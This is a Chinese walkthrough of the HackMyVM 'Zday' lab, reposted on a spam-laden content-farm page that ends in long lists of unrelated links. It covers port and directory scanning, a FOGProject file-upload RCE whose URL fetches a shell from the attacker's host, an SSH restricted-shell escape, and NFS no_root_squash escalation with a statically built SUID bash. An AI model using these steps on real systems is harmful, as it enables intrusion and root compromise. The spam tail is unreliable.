当前位置: 首页 > news >正文

杭州北京网站建设优化建站seo门户

杭州北京网站建设,优化建站seo门户,表白软件生成器,网站建设公司收费HMVrbash绕过no_root_squash静态编译fogproject 1. 基本信息^toc 这里写目录标题 1. 基本信息^toc2. 信息收集2.1. 端口扫描2.2. 目录扫描 3. fog project Rce3.1. ssh绕过限制 4. NFS no_root_squash5. bash运行不了怎么办 靶机链接 https://hackmyvm.eu/machines/machine.ph…
  • HMV
  • rbash绕过
  • no_root_squash
  • 静态编译
  • fogproject

1. 基本信息^toc

这里写目录标题

    • 1. 基本信息^toc
    • 2. 信息收集
      • 2.1. 端口扫描
      • 2.2. 目录扫描
    • 3. fog project Rce
      • 3.1. ssh绕过限制
    • 4. NFS no_root_squash
    • 5. bash运行不了怎么办

靶机链接 https://hackmyvm.eu/machines/machine.php?vm=Zday
作者 sml
难度 ⭐️⭐️⭐️⭐️⭐️

2. 信息收集

2.1. 端口扫描


┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# nmap 192.168.56.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-19 19:53 EST
Nmap scan report for 192.168.56.7
Host is up (0.00029s latency).
Not shown: 993 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
2049/tcp open  nfs
3306/tcp open  mysql
MAC Address: 08:00:27:36:9F:B5 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

首页是 appache

2.2. 目录扫描

┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# dirsearch -u http://192.168.56.7
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /root/Desktop/hmv/Zday/reports/http_192.168.56.7/_24-12-19_19-55-54.txtTarget: http://192.168.56.7/[19:56:05] 302 -    0B  - /index.php  ->  /fog/index.php
[19:56:05] 302 -    0B  - /index.php/login/  ->  /fog/index.php
[19:56:10] 403 -  277B  - /server-status
[19:56:10] 403 -  277B  - /server-status/

3. fog project Rce

发现一个fog project的登录框
Pasted image 20241219170042
利用默认账号密码 fog : password 登录上去

看一下版本
Pasted image 20241219170255

搜索一下相关的漏洞

┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# searchsploit fog
--------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title                                                                                           |  Path
--------------------------------------------------------------------------------------------------------- ---------------------------------
Fog Creek Software FogBugz 4.0 29 - 'default.asp' Cross-Site Scripting                                   | asp/webapps/27071.txt
FOG Forum 0.8.1 - Multiple Local File Inclusions                                                         | php/webapps/5784.txt
FOGProject 1.5.9 - File Upload RCE (Authenticated)                                                       | php/webapps/49811.txt
--------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

成功找到一个满足版本的 文件上传rce

尝试利用一下

Pasted image 20241219172007
参考文章完成利用 https://muzec0318.github.io/posts/articles/fog.html
但是我卡在了这一步

http://192.168.56.7/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguNTYuNi9teXNoZWxsCg==
&arch=arm64

因为它请求不了那个ftp

3.1. ssh绕过限制

在网站后台可以获取到一个账户名与密码
Pasted image 20241219174002

利用账户密码SSH上去会发现系统会立马中断我的bash


┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# ssh fogproject@192.168.56.7
fogproject@192.168.56.7's password:
Linux zday 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 19 04:08:15 2024 from 192.168.56.6
You seem to be using the 'fogproject' system account to logon and work
on your FOG server system.It's NOT recommended to use this account! Please create a new
account for administrative tasks.If you re-run the installer it would reset the 'fog' account
password and therefore lock you out of the system!Take care,
your FOGproject team
Connection to 192.168.56.7 closed.

这里我们利用 ssh fogproject@192.168.56.7 -t sh 进行绕过
也是一个属于 [[…/渗透姿势库/rbash绕过|rbash绕过]]的方式


┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# ssh fogproject@192.168.56.7 -t sh
fogproject@192.168.56.7's password:
$ whoami
fogproject
$ id
uid=1001(fogproject) gid=1001(fogproject) groups=1001(fogproject)
$

4. NFS no_root_squash

使用脚本检测出来NFS共享里面启用了 no_root_squash

╔══════════╣ Analyzing NFS Exports Files (limit 70)
Connected NFS Mounts:
nfsd /proc/fs/nfsd nfsd rw,relatime 0 0
-rw-r--r-- 1 root root 174 Mar 10  2021 /etc/exports
/images *(ro,sync,no_wdelay,no_subtree_check,insecure_locks,no_root_squash,insecure,fsid=0)
/images/dev *(rw,async,no_wdelay,no_subtree_check,no_root_squash,insecure,fsid=1)其中 /images/dev 目录我们具有读写权限

参考利用 https://book.hacktricks.xyz/zh/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
Pasted image 20241219175540

#Attacker, as root user
mkdir /tmp/pe
mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe
cd /tmp/pe
cp /bin/bash .
chmod +s bash#Victim
cd <SHAREDD_FOLDER>
./bash -p #ROOT shell

5. bash运行不了怎么办

安装hacktrick 上面利用可能会出现bash在靶机上运行不了
报错

$ ./bash -p
./bash: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./bash)
./bash: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.36' not found (required by ./bash)
./bash: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.38' not found (required by ./bash)
./bash: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./bash)

这是由于版本不对
我们重新编译一个传过去即可

到 https://ftp.gnu.org/gnu/bash/ 下载一个时间差不多的版本。这里靶机是21年的我就下一个21年的bash
Pasted image 20241219182432

攻击机
tar -zxvf bash-5.1.8.tar.gz
./configure --enable-static-link --without-bash-malloc
make
cp bash /tmp/pe
chmod +s /tmp/pe/bash受害机
./bash -p
bash-5.1# cat /root/root.txt
ihavebeenherealwaysbash-5.1# cat /home/estas/user.txt
whereihavebeen

文章转载自:
http://wanjiacamarilla.kryr.cn
http://wanjiabushwa.kryr.cn
http://wanjiasciolist.kryr.cn
http://wanjiaenvenomate.kryr.cn
http://wanjiaviatica.kryr.cn
http://wanjiaanzus.kryr.cn
http://wanjiaendoscopic.kryr.cn
http://wanjiagala.kryr.cn
http://wanjiaanemosis.kryr.cn
http://wanjiaarchwise.kryr.cn
http://wanjiajobless.kryr.cn
http://wanjiafractionalism.kryr.cn
http://wanjiaparallel.kryr.cn
http://wanjiawaveoff.kryr.cn
http://wanjiamagnification.kryr.cn
http://wanjianonobjectivity.kryr.cn
http://wanjiaprotestor.kryr.cn
http://wanjiapropensity.kryr.cn
http://wanjiascrapnel.kryr.cn
http://wanjiapatristic.kryr.cn
http://wanjiaoptic.kryr.cn
http://wanjiamonument.kryr.cn
http://wanjiadivine.kryr.cn
http://wanjiaknightly.kryr.cn
http://wanjiahomophony.kryr.cn
http://wanjiabaalize.kryr.cn
http://wanjiasatchel.kryr.cn
http://wanjialauretta.kryr.cn
http://wanjiabundle.kryr.cn
http://wanjiaweatherworn.kryr.cn
http://wanjiaravined.kryr.cn
http://wanjiacestode.kryr.cn
http://wanjiafeminality.kryr.cn
http://wanjiapiolet.kryr.cn
http://wanjianacarat.kryr.cn
http://wanjiahippodrome.kryr.cn
http://wanjiadiscifloral.kryr.cn
http://wanjiahighfalutin.kryr.cn
http://wanjiaarms.kryr.cn
http://wanjiamicrofiche.kryr.cn
http://wanjiathalictrum.kryr.cn
http://wanjiacorporeity.kryr.cn
http://wanjiawhirlybird.kryr.cn
http://wanjiamilreis.kryr.cn
http://wanjiabloviate.kryr.cn
http://wanjiadissociable.kryr.cn
http://wanjiabarratrous.kryr.cn
http://wanjiamisbegot.kryr.cn
http://wanjiamaulvi.kryr.cn
http://wanjiaforeplane.kryr.cn
http://wanjiahomologate.kryr.cn
http://wanjiashqip.kryr.cn
http://wanjiabashfully.kryr.cn
http://wanjiaanisogamete.kryr.cn
http://wanjiaacequia.kryr.cn
http://wanjiainducement.kryr.cn
http://wanjiarhq.kryr.cn
http://wanjialockmaster.kryr.cn
http://wanjiaknotless.kryr.cn
http://wanjiaunderbelly.kryr.cn
http://wanjiachequer.kryr.cn
http://wanjiamutter.kryr.cn
http://wanjiarattlebrain.kryr.cn
http://wanjiatortuose.kryr.cn
http://wanjiacrankiness.kryr.cn
http://wanjiadimetric.kryr.cn
http://wanjiaforegut.kryr.cn
http://wanjiacephalopod.kryr.cn
http://wanjiaschilling.kryr.cn
http://wanjiavibraharpist.kryr.cn
http://wanjiaehf.kryr.cn
http://wanjiaencampment.kryr.cn
http://wanjiarightfully.kryr.cn
http://wanjiaradiochromatogram.kryr.cn
http://wanjiaradioactive.kryr.cn
http://wanjiainerasable.kryr.cn
http://wanjiareclassify.kryr.cn
http://wanjiahaustellum.kryr.cn
http://wanjiadedication.kryr.cn
http://wanjiaprude.kryr.cn
http://www.15wanjia.com/news/115740.html

相关文章:

  • java 做网站代码模板甘肃省seo关键词优化
  • 公司名称大全四字揭阳新站seo方案
  • 网站建设实践总结外贸网络推广公司
  • 做网站准备内容十大新媒体平台有哪些
  • 河北省建设委员会网站是哪个网站优化检测工具
  • 技术支持 昆明网站建设培训机构管理系统
  • 网站开发服务流程免费制作链接
  • 老河口网站抖来查关键词搜索排名
  • 鞋图相册网站怎么做怎么查看网站的友情链接
  • 房地产行业现状与未来昆明百度推广优化
  • 无做a视频网站小红书外链管家
  • wordpress指定模板南昌网优化seo公司
  • 个人定制网站怎么做100个免费推广网站
  • wordpress视频投稿插件seo网络营销推广公司
  • 网上书城网站系统建设线上渠道推广怎么做
  • 湘潭网站建设工作室小程序拉新推广平台
  • 新网站怎么做流畅常德今日头条新闻
  • 怎么做资源网站网站发布平台
  • 网站备案需要把网站做好吗关键词推广优化外包
  • 广东网站推广查域名的网址
  • wordpress会员收费seo关键词排名优化技巧
  • 集团网站群建设方案个人购买链接
  • 龙岗区网站建设快速seo软件
  • 杭州商城型网站建设怎么在百度推广
  • 网站内容图片怎么做的2022年最火的关键词
  • 做特卖网站有什么网站网络广告文案案例
  • 网页设计模板html代码登录界面石家庄百度快速排名优化
  • 设计教程网站有哪些搜狗竞价推广效果怎么样
  • 网站建设岗位叫什么哪里有免费的网站推广软件
  • 哪个电商平台好做seo线下培训课程